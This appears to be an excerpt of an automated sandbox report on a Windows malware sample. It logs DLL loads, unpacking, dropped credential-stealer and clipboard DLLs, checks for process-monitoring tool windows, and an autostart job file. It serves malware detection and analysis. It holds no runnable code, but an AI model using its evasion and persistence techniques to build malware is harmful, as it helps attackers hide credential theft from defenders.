Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static file information: File size 3010048 > 1048576
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: Raw size of qatcqnjl is bigger than: 0x100000 < 0x2aca00
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: real checksum: 0x2e742d should be: 0x2e4b35
Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: explorha.exe.0.dr Static PE information: real checksum: 0x2e742d should be: 0x2e4b35
Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: qatcqnjl
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: zabsvnpb
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: qatcqnjl
Source: explorha.exe.0.dr Static PE information: section name: zabsvnpb
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E229A0 push esp; ret 0_2_00E229A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E19420 push ebx; ret 0_2_00E1942A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E18DE6 push esi; iretd 0_2_00E18DE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E2EFBC push ecx; ret 0_2_00E2EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0086C0E8 push cs; retn 0002h 1_2_0086C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00869420 push ebx; ret 1_2_0086942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00868DE6 push esi; iretd 1_2_00868DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0087EFBC push ecx; ret 1_2_0087EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0086C0E8 push cs; retn 0002h 2_2_0086C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00869420 push ebx; ret 2_2_0086942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00868DE6 push esi; iretd 2_2_00868DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0087EFBC push ecx; ret 2_2_0087EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0089F4FB push ss; iretd 6_2_0089F4FC
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087F666 push ecx; ret 6_2_0087F679
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087EFBC push ecx; ret 6_2_0087EFCF
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: entropy: 7.982348024472177
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.982348024472177
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
